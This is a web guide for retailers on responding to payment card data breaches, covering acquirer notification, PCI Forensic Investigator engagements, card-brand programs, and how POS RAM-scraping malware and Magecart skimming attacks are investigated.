How do you respond to a retail data breach?
Contain first, notify immediately, and preserve forensic evidence. The acquirer notification must happen within 24 hours of suspecting a payment card compromise—before the full scope is known. Waiting for certainty before calling the bank is the most common and costly mistake retailers make.
The first action on discovering a suspected payment card breach is isolation: take affected POS terminals or payment servers offline from the network without rebooting them. Rebooting destroys volatile memory evidence—RAM that may contain card track data, encryption keys, or malware artifacts. If the compromise is on an e-commerce site, disable or quarantine the affected JavaScript components or the entire checkout flow while preserving server logs and a copy of the page source.
Preserve logs immediately. Web application logs, network firewall logs, and POS transaction logs from 90 days before the suspected compromise window are standard PFI requests. Many retailers discover their logging retention was insufficient—a compliance failure that complicates forensics. SIEM data, if available, should be frozen and a copy taken before any remediation actions modify it.
Call the acquiring bank within 24 hours. The acquirer is your bridge to the card brands (Visa, Mastercard, Discover, Amex). They initiate the Account Data Compromise process and, if warranted, the PFI engagement. Do not contact Visa or Mastercard directly as a merchant—the acquirer relationship is the required channel. Your acquiring bank's fraud or risk department should have a 24-hour breach notification number; confirm it before an incident occurs.
Simultaneously, engage a retail-specialized IR firm and notify your cyber insurer. Find IR firms specializing in retail breach response. State notification analysis should begin in parallel—you cannot wait for the PFI investigation to complete before assessing state law obligations.
What is a PCI Forensic Investigator (PFI) and when is one required?
A PCI Forensic Investigator is a forensics firm certified by the PCI Security Standards Council and approved by both Visa and Mastercard to investigate suspected cardholder data breaches. A PFI engagement is mandatory under card-brand rules when a merchant or service provider is suspected of a compromise involving payment card data.
PFIs are a distinct credential from standard QSAs (Qualified Security Assessors). The PCI SSC publishes the list of approved PFI companies; as of May 2026, approximately 27 firms hold PFI certification globally. Not every IR firm can conduct a PFI investigation—engaging an uncertified firm wastes time and money, because the card brands will require a PFI to repeat the work anyway.
The PFI is engaged by the acquirer on behalf of the card brands—not by the merchant directly. In practice, the acquirer notifies Visa and Mastercard's fraud teams, who confirm that a PFI investigation is required and may specify approved firms for the engagement. The merchant pays the PFI's fees, which typically range from $50,000 to $250,000 for a mid-size investigation, though complex multi-location investigations can exceed $500,000.
The PFI investigation has two key deliverables: a Preliminary Findings report (typically due within 5 business days of engagement) and a Final Forensic Report (typically within 10 business days of completing evidence collection). These deadlines are contractual under card-brand rules and short—meaning the PFI firm must be on-site or remote-forensics capable within days of engagement. Pre-qualifying a PFI through an IR retainer is the only reliable way to meet these timelines.
PFI investigation scope
- Determine whether cardholder data (CHD) was accessed, acquired, or exfiltrated
- Identify the attack vector and the full timeline of compromise
- Confirm whether PCI DSS controls were in place at the time of the breach
- Identify affected card numbers and the time window of exposure (used to define the compromised card population)
- Provide remediation recommendations to prevent recurrence
How do you notify the card brands after a breach?
Acquirer notification within 24 hours of suspecting a compromise is the first mandatory step. The acquirer then manages communication to Visa's Account Data Compromise (ADC) program and Mastercard's Site Data Protection (SDP) program. Merchants do not notify card brands directly.
Visa's ADC program and Mastercard's SDP program are the card-brand frameworks governing how payment card breaches are investigated and resolved. Both programs impose financial liability on merchants and acquirers: the card brands issue fines (called "assessments") and may require the acquirer to fund card reissuance costs for compromised accounts. These assessments can run from tens of thousands to millions of dollars depending on the number of compromised accounts and the merchant's PCI compliance status at the time of breach.
A merchant that was PCI DSS compliant at the time of the breach typically faces reduced assessments—this is the core financial incentive for maintaining compliance. A merchant found non-compliant at the time of a breach faces both the full assessment and potential loss of card acceptance privileges. The PFI's determination of compliance status at breach time is therefore significant beyond the forensic findings.
The compromised card population—the set of card numbers that were potentially exposed during the confirmed window of compromise—is defined by the PFI's investigation. The card brands use this population to issue alerts to issuing banks, which decide independently whether to reissue cards. The merchant (through the acquirer) may be assessed for card reissuance costs.
What is POS malware and how is it investigated?
POS (point-of-sale) malware intercepts payment card track data from the system's memory during the authorization process—before it is encrypted for transmission. RAM scrapers harvest card numbers, expiration dates, and service codes that are momentarily in cleartext in the application's memory space.
Card track data (Track 1 and Track 2) is required to be encrypted at rest and in transit under PCI DSS. But there is a brief window during authorization when this data is processed in application memory in cleartext. RAM-scraping malware targets this window, scanning memory regions used by payment applications and extracting the track data before it is encrypted or overwritten.
Historically significant POS malware families include BlackPOS (used in the 2013 Target breach, which compromised 40 million cards), Alina, JackPOS, and PoSeidon. Most current-generation POS malware uses process injection to embed in legitimate POS application processes, making detection by traditional endpoint security difficult. Forensic investigation of a POS breach typically involves memory analysis of affected terminals, review of the POS application's process list and loaded modules, and examination of network traffic logs for outbound connections to C2 infrastructure.
POS terminals in multi-location retail environments present a particular challenge: malware may be present across hundreds or thousands of terminals, each requiring forensic imaging. PFI investigations in large retail chains often involve remote forensic collection tools that capture memory and logs across the terminal fleet without requiring physical access to each device.
What is Magecart / e-commerce skimming and how is it investigated?
Magecart attacks inject malicious JavaScript into e-commerce checkout pages to capture payment card data in real time as customers type it. The skimmer silently copies card numbers, CVVs, and billing details to attacker servers. Retailers using third-party JavaScript components—analytics, A/B testing tools, chatbots—are vulnerable to supply-chain variants where the skimmer is injected into a trusted third-party script.
The term "Magecart" originated from attacks targeting Magento-based e-commerce sites around 2015–2016. It now refers broadly to any client-side payment skimming attack, regardless of platform. Magecart groups compromised British Airways (2018, approximately 500,000 customers), Ticketmaster (2018), and Newegg (2018) through injected JavaScript on checkout pages or through compromised third-party analytics providers.
Unlike POS malware, Magecart operates entirely in the visitor's browser. The malicious script captures keystrokes or form submissions on the checkout page and exfiltrates them to a domain that often mimics a legitimate analytics or CDN provider. Detection requires monitoring the checkout page's Content Security Policy compliance, reviewing subresource integrity hashes, and scanning loaded third-party scripts for obfuscated or anomalous code.
Forensic investigation of a Magecart incident involves preserving a copy of the affected page source and all loaded scripts at the time of the incident (captured from server logs, CDN logs, or browser cache), identifying the injection point, and determining the exfiltration endpoint. The window of compromise—used to define the affected cardholder population—is bounded by when the malicious script was first loaded and when it was removed. Many retailers discover Magecart attacks through fraud reports from card issuers rather than through their own monitoring.
Retail breach types: vector, scope, and forensic focus
Retail breaches fall into four primary patterns. Knowing the breach type determines which forensic discipline leads, which evidence to preserve first, and which card-brand notification pathway applies.
| Breach type | Attack vector | Data at risk | Forensic focus |
|---|---|---|---|
| POS RAM scraping | Remote access to POS network; malware injected into POS application process | Track 1 / Track 2 data from swiped/dipped cards at in-store terminals | Memory forensics on POS terminals; network traffic analysis for C2; timeline of malware installation |
| Magecart / JS skimmer | Direct CMS compromise or third-party script supply-chain injection | Card-not-present data (PAN, CVV, expiry, billing address) entered in browser | Page source preservation; script diff analysis; CDN and web server log review; exfiltration domain investigation |
| Database / e-commerce data store exfiltration | SQL injection, credential compromise, or unsecured cloud storage bucket | Stored card data (if not tokenized), customer PII, order history | Database access logs; query history; cloud access logs; data classification to confirm PCI DSS scope |
| Physical skimmer / card-present fraud | Hardware skimmer or shimmer installed on ATM or unattended POS terminal | Track data and sometimes PIN from affected terminals | Physical device inspection; surveillance footage review; transaction log correlation to identify exposure window |
Frequently asked questions
How do you respond to a retail data breach involving payment cards?
Isolate affected systems without rebooting, preserve forensic evidence, notify your acquiring bank within 24 hours, engage a PCI-approved PFI, and begin state notification analysis in parallel. Waiting for certainty before notifying the acquirer is the most common and costly mistake.
What is a PCI Forensic Investigator (PFI) and when is one required?
A PCI Forensic Investigator is a forensics firm approved by Visa and Mastercard to conduct mandatory investigations after suspected payment card breaches. A PFI is required under card-brand rules whenever a merchant or service provider is suspected of compromising cardholder data. The acquirer initiates the engagement; the merchant pays the fees.
What are the card-brand notification deadlines?
Notify the acquiring bank within 24 hours of suspecting a compromise. The PFI preliminary report is typically due within 5 business days of engagement; the final report within 10 business days. These deadlines are contractual under Visa ADC and Mastercard SDP program rules and cannot be extended without card-brand approval.
Does being PCI DSS compliant at the time of the breach reduce fines?
Yes. PCI DSS compliance status at the time of a breach is a key factor in card-brand assessments. Merchants who were compliant typically face reduced fines and may be eligible for assessment waivers in some programs. Non-compliant merchants face the full assessment schedule and potential suspension of card acceptance privileges.
Do retail breaches trigger state data breach notification laws?
Yes. All 50 U.S. states have breach notification laws, and payment card numbers with cardholder name trigger notification in most jurisdictions. Multi-state retailers must simultaneously analyze notification obligations in every state where affected cardholders reside. See the state notification requirements guide.
Find a retail breach specialist
PCI PFI investigations require pre-certified forensics firms. Engaging a non-approved firm means the work will need to be repeated. Find the right team before the breach.